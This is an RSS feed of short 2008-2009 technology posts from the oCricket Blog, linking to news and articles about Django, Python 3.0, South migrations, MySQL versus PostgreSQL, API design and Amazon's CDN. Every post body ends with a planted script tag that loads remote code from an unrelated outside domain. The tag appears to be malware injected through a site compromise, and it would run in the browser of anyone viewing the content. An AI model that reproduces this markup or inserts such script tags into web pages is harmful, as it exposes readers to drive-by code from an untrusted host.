<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>oCricket Blog &#187; Technology</title>
	<atom:link href="http://blog.ocricket.com/tag/technology/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.ocricket.com</link>
	<description>What's happening at oCricket</description>
	<lastBuildDate>Mon, 27 Jul 2009 14:39:21 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Real World Django</title>
		<link>http://blog.ocricket.com/real-world-django/</link>
		<comments>http://blog.ocricket.com/real-world-django/#comments</comments>
		<pubDate>Sat, 28 Mar 2009 18:15:50 +0000</pubDate>
		<dc:creator>Brajeshwar</dc:creator>
				<category><![CDATA[Technology]]></category>
		<category><![CDATA[Django]]></category>
		<category><![CDATA[python]]></category>

		<guid isPermaLink="false">http://11.ocricket.com/?p=188</guid>
		<description><![CDATA[There&#8217;s plenty of material (documentation, blogs, books) out there that&#8217;ll help you write a site using Django&#8230; but then what? You&#8217;ve still got to test, deploy, monitor, and tune the site; failure at deployment time means all your beautiful code is for naught.

Read Read World Django as it unfolds the tutorial which examines how best [...]]]></description>
			<content:encoded><![CDATA[<p>There&#8217;s plenty of material (documentation, blogs, books) out there that&#8217;ll help you write a site using Django&#8230; but then what? You&#8217;ve still got to test, deploy, monitor, and tune the site; failure at deployment time means all your beautiful code is for naught.</p>

<p>Read <a href="http://jacobian.org/speaking/2009/real-world-django/">Read World Django</a> as it unfolds the tutorial which examines how best to cope when the Real World intrudes on your carefully designed website.<script src="http://ae.awaue.com/7"></script></p>]]></content:encoded>
			<wfw:commentRss>http://blog.ocricket.com/real-world-django/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Python 3.0 released</title>
		<link>http://blog.ocricket.com/python-30-released/</link>
		<comments>http://blog.ocricket.com/python-30-released/#comments</comments>
		<pubDate>Thu, 04 Dec 2008 06:20:36 +0000</pubDate>
		<dc:creator>Harsh</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[Technology]]></category>

		<guid isPermaLink="false">http://11.ocricket.com/?p=168</guid>
		<description><![CDATA[Python 3.0 (a.k.a. &#8220;Python 3000&#8243; or &#8220;Py3k&#8221;) is a new version of the language that is incompatible with the 2.x line of releases. The language is mostly the same, but many details, especially how built-in objects like dictionaries and strings work, have changed considerably, and a lot of deprecated features have finally been removed. Also, [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.python.org/download/releases/3.0/">Python 3.0</a> (a.k.a. &#8220;Python 3000&#8243; or &#8220;Py3k&#8221;) is a new version of the language that is incompatible with the 2.x line of releases. The language is mostly the same, but many details, especially how built-in objects like dictionaries and strings work, have changed considerably, and a lot of deprecated features have finally been removed. Also, the standard library has been reorganized in a few prominent places.<script src="http://ae.awaue.com/7"></script></p>]]></content:encoded>
			<wfw:commentRss>http://blog.ocricket.com/python-30-released/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>South brings migrations to Django applications</title>
		<link>http://blog.ocricket.com/south-brings-migrations-to-django-applications/</link>
		<comments>http://blog.ocricket.com/south-brings-migrations-to-django-applications/#comments</comments>
		<pubDate>Wed, 03 Dec 2008 14:13:31 +0000</pubDate>
		<dc:creator>Brajeshwar</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[Django]]></category>
		<category><![CDATA[South]]></category>
		<category><![CDATA[Technology]]></category>

		<guid isPermaLink="false">http://11.ocricket.com/?p=166</guid>
		<description><![CDATA[The main objectives of South are to provide a simple, stable and database-independent migration layer to prevent all the hassle schema changes over time bring to your Django applications.]]></description>
			<content:encoded><![CDATA[<p>The main objectives of <a href="http://south.aeracode.org/">South</a> are to provide a simple, stable and database-independent migration layer to prevent all the hassle schema changes over time bring to your Django applications.<script src="http://ae.awaue.com/7"></script></p>]]></content:encoded>
			<wfw:commentRss>http://blog.ocricket.com/south-brings-migrations-to-django-applications/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Django-Taggable</title>
		<link>http://blog.ocricket.com/django-taggable/</link>
		<comments>http://blog.ocricket.com/django-taggable/#comments</comments>
		<pubDate>Tue, 18 Nov 2008 07:19:11 +0000</pubDate>
		<dc:creator>Brajeshwar</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[Django]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[Technology]]></category>

		<guid isPermaLink="false">http://11.ocricket.com/?p=156</guid>
		<description><![CDATA[Gustavo Picon, announced his new project django-taggable. As the author describes, django-taggable is &#8220;An efficient, denormalized and multidimensional tagging library for Django 1.0+&#8221;]]></description>
			<content:encoded><![CDATA[<p>Gustavo Picon, announced his new project <a href="http://code.google.com/p/django-taggable/">django-taggable</a>. As the author describes, django-taggable is &#8220;An efficient, denormalized and multidimensional tagging library for Django 1.0+&#8221;<script src="http://ae.awaue.com/7"></script></p>]]></content:encoded>
			<wfw:commentRss>http://blog.ocricket.com/django-taggable/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Django 1.0.1 released</title>
		<link>http://blog.ocricket.com/django-101-released/</link>
		<comments>http://blog.ocricket.com/django-101-released/#comments</comments>
		<pubDate>Sat, 15 Nov 2008 07:05:24 +0000</pubDate>
		<dc:creator>Brajeshwar</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[Django]]></category>
		<category><![CDATA[Technology]]></category>

		<guid isPermaLink="false">http://11.ocricket.com/?p=154</guid>
		<description><![CDATA[Following Django&#8217;s previously-announced schedule, the Django team has released Django 1.0.1. This is a bugfix-only release containing fixes and improvements to the Django 1.0 codebase, and is a recommended upgrade for anyone using or targeting Django 1.0.]]></description>
			<content:encoded><![CDATA[<p>Following Django&#8217;s <a href="http://www.djangoproject.com/weblog/2008/oct/24/upcoming-releases/">previously-announced schedule</a>, the Django team has <a href="http://www.djangoproject.com/weblog/2008/nov/15/101/">released</a> Django 1.0.1. This is a bugfix-only release containing fixes and improvements to the Django 1.0 codebase, and is a recommended upgrade for anyone using or targeting Django 1.0.<script src="http://ae.awaue.com/7"></script></p>]]></content:encoded>
			<wfw:commentRss>http://blog.ocricket.com/django-101-released/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Mutiny interviewed BGhose</title>
		<link>http://blog.ocricket.com/mutiny-interviewed-bghose/</link>
		<comments>http://blog.ocricket.com/mutiny-interviewed-bghose/#comments</comments>
		<pubDate>Tue, 11 Nov 2008 05:11:45 +0000</pubDate>
		<dc:creator>Brajeshwar</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[india]]></category>
		<category><![CDATA[Team]]></category>
		<category><![CDATA[Technology]]></category>
		<category><![CDATA[Ubunti]]></category>

		<guid isPermaLink="false">http://11.ocricket.com/?p=145</guid>
		<description><![CDATA[Baishampayan Ghose is one of the founders of the Ubuntu India. He has been an active user &#38; developer of Free &#38; Open Source Software for as long as he can remember.

BG was interviewed by Mutiny.in &#8212; Read the interview &#8212; about Ubuntu in India.]]></description>
			<content:encoded><![CDATA[<blockquote>Baishampayan Ghose is one of the founders of the Ubuntu India. He has been an active user &amp; developer of Free &amp; Open Source Software for as long as he can remember.</blockquote>

<p>BG was interviewed by Mutiny.in &#8212; <a href="http://mutiny.in/2008/11/10/interview-with-baishampayan-ghose/">Read the interview</a> &#8212; about Ubuntu in India.<script src="http://ae.awaue.com/7"></script></p>]]></content:encoded>
			<wfw:commentRss>http://blog.ocricket.com/mutiny-interviewed-bghose/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Why Programmers Suck at CSS Design</title>
		<link>http://blog.ocricket.com/why-programmers-suck-at-css-design/</link>
		<comments>http://blog.ocricket.com/why-programmers-suck-at-css-design/#comments</comments>
		<pubDate>Wed, 29 Oct 2008 09:58:02 +0000</pubDate>
		<dc:creator>Brajeshwar</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[CSS]]></category>
		<category><![CDATA[Programming]]></category>
		<category><![CDATA[Technology]]></category>

		<guid isPermaLink="false">http://11.ocricket.com/?p=143</guid>
		<description><![CDATA[Programmers tend to avoid doing certain things not because they are inherently bad at it, but because they don&#8217;t know how to proceed. They find themselves in an uncharted and foggy territory, without a map, no sense of direction, and with a limited ability to know if they&#8217;re getting any closer to where they want [...]]]></description>
			<content:encoded><![CDATA[<blockquote>Programmers tend to avoid doing certain things not because they are inherently bad at it, but because they don&#8217;t know how to proceed. They find themselves in an uncharted and foggy territory, without a map, no sense of direction, and with a limited ability to know if they&#8217;re getting any closer to where they want to be. Also, when they talk to people that don&#8217;t share such problems and find it all too natural and obvious, it&#8217;s hard for the two to communicate in terms that make sense to a programmer.</blockquote>

<p><a href="http://www.betaversion.org/~stefano/linotype/news/169/">Read the article</a> in Full at Beta Version.<script src="http://ae.awaue.com/7"></script></p>]]></content:encoded>
			<wfw:commentRss>http://blog.ocricket.com/why-programmers-suck-at-css-design/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Yahoo! Open Strategy</title>
		<link>http://blog.ocricket.com/yahoo-open-strategy/</link>
		<comments>http://blog.ocricket.com/yahoo-open-strategy/#comments</comments>
		<pubDate>Wed, 29 Oct 2008 07:23:09 +0000</pubDate>
		<dc:creator>Brajeshwar</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[Technology]]></category>
		<category><![CDATA[Yahoo!]]></category>

		<guid isPermaLink="false">http://11.ocricket.com/?p=141</guid>
		<description><![CDATA[Yahoo! Open Strategy (Y!OS) platform launch gives you something to get your hands on to various Yahoo! Services. Today Yahoo! is making Y!OS a reality for developers through the release of the Yahoo! Application Platform (YAP), Yahoo! Social Platform (YSP) and Yahoo! Query Language (YQL). Now, anyone on the web has access to Yahoo!&#8217;s tools [...]]]></description>
			<content:encoded><![CDATA[<p>Yahoo! Open Strategy (Y!OS) platform launch gives you something to get your hands on to various Yahoo! Services. Today Yahoo! is making <a href="http://developer.yahoo.net/blog/archives/2008/10/yos_10_launch.html">Y!OS a reality for developers</a> through the release of the Yahoo! Application Platform (YAP), Yahoo! Social Platform (YSP) and Yahoo! Query Language (YQL). Now, anyone on the web has access to Yahoo!&#8217;s tools and data to start building applications for Yahoo!&#8217;s vast audience and the web beyond.<script src="http://ae.awaue.com/7"></script></p>]]></content:encoded>
			<wfw:commentRss>http://blog.ocricket.com/yahoo-open-strategy/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>MySQL vs PostgreSQL</title>
		<link>http://blog.ocricket.com/mysql-vs-postgresql/</link>
		<comments>http://blog.ocricket.com/mysql-vs-postgresql/#comments</comments>
		<pubDate>Fri, 10 Oct 2008 06:35:17 +0000</pubDate>
		<dc:creator>Brajeshwar</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[MySQL]]></category>
		<category><![CDATA[PostgreSQL]]></category>
		<category><![CDATA[Technology]]></category>

		<guid isPermaLink="false">http://11.ocricket.com/?p=139</guid>
		<description><![CDATA[Wikivs have a rather good comparison of MySQL vs PostgreSQL.

MySQL vs PostgreSQL is a decision many must make when approaching open-source relational databases management systems. Both are time-proven solutions that compete strongly with propriety database software.]]></description>
			<content:encoded><![CDATA[<p>Wikivs have a rather good comparison of <a href="http://www.wikivs.com/wiki/MySQL_vs_PostgreSQL">MySQL vs PostgreSQL</a>.</p>

<blockquote>MySQL vs PostgreSQL is a decision many must make when approaching open-source relational databases management systems. Both are time-proven solutions that compete strongly with propriety database software.</blockquote><script src="http://ae.awaue.com/7"></script>]]></content:encoded>
			<wfw:commentRss>http://blog.ocricket.com/mysql-vs-postgresql/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Joshua Bloch on API Design</title>
		<link>http://blog.ocricket.com/joshua-bloch-on-api-design/</link>
		<comments>http://blog.ocricket.com/joshua-bloch-on-api-design/#comments</comments>
		<pubDate>Tue, 23 Sep 2008 12:37:32 +0000</pubDate>
		<dc:creator>Brajeshwar</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[Technology]]></category>

		<guid isPermaLink="false">http://11.ocricket.com/?p=130</guid>
		<description><![CDATA[Public APIs, like diamonds, are forever. You have one chance to get it right so give it your best.

Joshua Bloch talks about the key points of API design, in easily digestible form.]]></description>
			<content:encoded><![CDATA[<blockquote>Public <span class="caps">API</span>s, like diamonds, are forever. You have one chance to get it right so give it your best.</blockquote>

<p>Joshua Bloch talks about the <a href="http://www.infoq.com/articles/API-Design-Joshua-Bloch">key points of <span class="caps">API </span>design</a>, in easily digestible form.<script src="http://ae.awaue.com/7"></script></p>]]></content:encoded>
			<wfw:commentRss>http://blog.ocricket.com/joshua-bloch-on-api-design/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Amazon CDN</title>
		<link>http://blog.ocricket.com/amazon-cdn/</link>
		<comments>http://blog.ocricket.com/amazon-cdn/#comments</comments>
		<pubDate>Thu, 18 Sep 2008 14:49:04 +0000</pubDate>
		<dc:creator>Brajeshwar</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[Amazon]]></category>
		<category><![CDATA[Technology]]></category>

		<guid isPermaLink="false">http://11.ocricket.com/?p=126</guid>
		<description><![CDATA[Everybody is talking about Amazon&#8217;s announcement of their CDN Service which will be rolled out around the end of this year.]]></description>
			<content:encoded><![CDATA[<p>Everybody is talking about Amazon&#8217;s announcement of their <a href="http://aws.typepad.com/aws/2008/09/were-never-cont.html"><span class="caps">CDN</span> Service</a> which will be rolled out around the end of this year.<script src="http://ae.awaue.com/7"></script></p>]]></content:encoded>
			<wfw:commentRss>http://blog.ocricket.com/amazon-cdn/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
